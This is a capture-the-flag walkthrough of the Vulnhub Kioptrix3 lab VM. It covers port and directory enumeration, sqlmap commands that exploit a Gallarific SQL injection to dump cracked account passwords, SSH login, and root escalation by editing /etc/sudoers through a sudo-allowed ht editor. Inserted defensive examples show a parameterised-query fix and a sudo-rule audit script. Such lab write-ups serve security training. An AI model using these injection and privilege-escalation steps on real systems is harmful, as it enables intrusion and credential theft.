[Vulnhub] KVM3 (privilege escalation via the ht editor)

2024-06-04

Information gathering

Target IP: 192.168.8.100

Service enumeration

Server IP Address    Ports Open
192.168.8.100        TCP 22, 80

Scan with Nmap:

$ nmap -p- -sV -sC 192.168.8.100 --min-rate 1000

Result:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 04:35 EDT
Nmap scan report for 192.168.8.100 (192.168.8.100)
Host is up (0.0030s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds

Directory enumeration

$ dirsearch -u "http://192.168.8.100/"

Result:

_|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/maptnh/reports/http_192.168.8.100/__24-05-18_04-38-27.txt

Target: http://192.168.8.100/

[04:38:27] Starting:
[04:38:29] 403 -  331B  - /.ht_wsr.txt
[04:38:29] 403 -  334B  - /.htaccess.bak1
[04:38:29] 403 -  334B  - /.htaccess.orig
[04:38:29] 403 -  336B  - /.htaccess.sample
[04:38:29] 403 -  334B  - /.htaccess.save
[04:38:29] 403 -  332B  - /.htaccess_sc
[04:38:29] 403 -  334B  - /.htaccess_orig
[04:38:29] 403 -  332B  - /.htaccessOLD
[04:38:29] 403 -  333B  - /.htaccessOLD2
[04:38:29] 403 -  335B  - /.htaccess_extra
[04:38:29] 403 -  332B  - /.htaccessBAK
[04:38:29] 403 -  325B  - /.html
[04:38:29] 403 -  324B  - /.htm
[04:38:29] 403 -  334B  - /.htpasswd_test
[04:38:29] 403 -  331B  - /.httr-oauth
[04:38:29] 403 -  330B  - /.htpasswds
[04:38:49] 301 -  353B  - /cache  ->  http://192.168.8.100/cache/
[04:38:52] 301 -  352B  - /core  ->  http://192.168.8.100/core/
[04:38:52] 200 -  688B  - /core/fragments/moduleInfo.phtml
[04:38:53] 403 -  324B  - /data
[04:38:53] 403 -  336B  - /data/adminer.php
[04:38:53] 403 -  336B  - /data/autosuggest
[04:38:53] 403 -  333B  - /data/backups/
[04:38:53] 403 -  349B  - /data/DoctrineORMModule/Proxy/
[04:38:53] 403 -  349B  - /data/DoctrineORMModule/cache/
[04:38:53] 403 -  334B  - /data/sessions/
[04:38:53] 403 -  331B  - /data/files/
[04:38:53] 403 -  325B  - /data/
[04:38:53] 403 -  331B  - /data/cache/
[04:38:53] 403 -  331B  - /data/debug/
[04:38:53] 403 -  330B  - /data/logs/
[04:38:53] 403 -  329B  - /data/tmp/
[04:38:57] 200 -   23KB - /favicon.ico
[04:38:58] 301 -  355B  - /gallery  ->  http://192.168.8.100/gallery/
[04:39:10] 301 -  355B  - /modules  ->  http://192.168.8.100/modules/
[04:39:10] 200 -    2KB - /modules/
[04:39:15] 301 -  358B  - /phpmyadmin  ->  http://192.168.8.100/phpmyadmin/
[04:39:16] 401 -  519B  - /phpmyadmin/scripts/setup.php
[04:39:16] 200 -    8KB - /phpmyadmin/
[04:39:16] 200 -    8KB - /phpmyadmin/index.php
[04:39:21] 403 -  334B  - /server-status/
[04:39:21] 403 -  333B  - /server-status
[04:39:25] 301 -  353B  - /style  ->  http://192.168.8.100/style/
[04:39:30] 200 -   18B  - /update.php

Task Completed

SQL injection

Visit the target: http://192.168.8.100/gallery/

Use searchsploit to look up the known historical CVEs for Gallarific:

$ searchsploit Gallarific

Result:

--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gallarific - 'search.php?query' Cross-Site Scripting                                                                       | php/webapps/31369.txt
Gallarific - 'user.php' Arbirary Change Admin Information                                                                  | php/webapps/8796.html
Gallarific - Multiple Script Direct Request Authentication Bypass                                                          | php/webapps/31370.txt
Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category                                                             | php/webapps/9421.txt
GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection                                                          | php/webapps/15891.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Use: php/webapps/15891.txt

$ cat /usr/share/exploitdb/exploits/php/webapps/15891.txt

Retrieving the database

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" --dbs --batch

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery --tables --batch

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump --batch

+----+---------------------------------------------+------------+
| id | password                                    | username   |
+----+---------------------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+
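The bug behind the three sqlmap runs above, as an added example that is not part of the original post: the gallery.php?id= parameter is concatenated into the SQL text, so an attacker-controlled value rewrites the query. Table and column names below are assumptions (the real Gallarific schema is not shown on the page); the hardened version validates the type and binds a parameter.

```python
import sqlite3

# Constructed stand-in for the target's `gallery` database. Table and column
# names are assumptions; the real Gallarific schema is not shown on the page.
def make_gallery_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT, public INTEGER)")
    con.executemany("INSERT INTO photos VALUES (?, ?, ?)",
                    [(1, "goat-1.jpg", 1), (2, "goat-2.jpg", 1), (3, "internal.jpg", 0)])
    return con


def photo_vulnerable(con, raw_id):
    """Mirrors gallery.php?id=: the raw query-string value is pasted into the SQL."""
    sql = "SELECT id, title FROM photos WHERE public = 1 AND id = " + raw_id
    return con.execute(sql).fetchall()


def photo_safe(con, raw_id):
    """Hardened form: reject non-integers up front, then bind the value as a parameter."""
    try:
        photo_id = int(raw_id)
    except (TypeError, ValueError):
        return []
    return con.execute(
        "SELECT id, title FROM photos WHERE public = 1 AND id = ?", (photo_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_gallery_db()
    # Normal request: one public photo either way.
    print(photo_vulnerable(db, "1"), photo_safe(db, "1"))
    # Tampered id: the concatenated query also leaks the non-public row because
    # AND binds tighter than OR; the parameterised one rejects the non-integer.
    print(photo_vulnerable(db, "1 OR 1=1"), photo_safe(db, "1 OR 1=1"))
```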

SSH

$ ssh loneferret@192.168.8.100

Local.txt contents

loneferret@Kioptrix3:~$ cat /home/loneferret/Local.txt

u28dt2i0

Privilege escalation

loneferret@Kioptrix3:~$ sudo -l

Result:

User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

The file /usr/local/bin/ht also turns out to have the SUID bit set.

loneferret@Kioptrix3:~$ ls -la /usr/local/bin/ht

Try running it:
loneferret@Kioptrix3:~$ /usr/local/bin/ht

Result:
Error opening terminal: xterm-256color.

Set TERM=xterm (the old system has no terminfo entry for xterm-256color) so that the terminal application can render its interface correctly.

loneferret@Kioptrix3:~$ export TERM=xterm

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht

The ht editor is now running with root privileges, so it can edit any file.

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht /etc/sudoers

Press F3, type /etc/sudoers, and press Enter to open the file.

Press F2 to save the file.

loneferret@Kioptrix3:~$ sudo /bin/bash
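The same sudoers rules from a defender's side, as an added example (not from the original post): a small audit that parses `sudo -l` output and flags the two weaknesses used above, a negated `!/usr/bin/su` entry that protects nothing and an editor that can be run as root. The editor and shell lists are illustrative assumptions, not an exhaustive catalogue.

```python
import re

# Constructed sample, copied from the `sudo -l` result shown above.
SUDO_L_OUTPUT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Illustrative lists (assumption, not exhaustive): programs that, once run as
# root, let the caller write arbitrary files or drop into a shell.
EDITORS = {"ht", "vi", "vim", "nano", "emacs", "ed"}
SHELLS = {"sh", "bash", "dash", "zsh", "su"}

# "(runas) TAG: TAG: command" as printed by `sudo -l`
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def audit_sudo_l(text):
    """Return (command, issue) pairs for risky rules found in `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # user part of "(user : group)"
        cmd = m.group("cmd")
        if cmd.startswith("!"):
            # sudoers(5): subtracting commands with '!' is not a control, since the
            # user can copy the binary under another name. Report it as no protection.
            findings.append((cmd, "negated command: provides no protection"))
            continue
        if runas not in ("root", "ALL"):
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL" or binary in SHELLS:
            findings.append((cmd, "direct root shell"))
        elif binary in EDITORS:
            findings.append((cmd, "editor as root: can rewrite /etc/sudoers or any other file"))
    return findings


if __name__ == "__main__":
    for cmd, issue in audit_sudo_l(SUDO_L_OUTPUT):
        print(f"{cmd:25} {issue}")
```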

Proot.txt contents

root@Kioptrix3:~# cat /root/Proot.txt

d2ua8u2yd
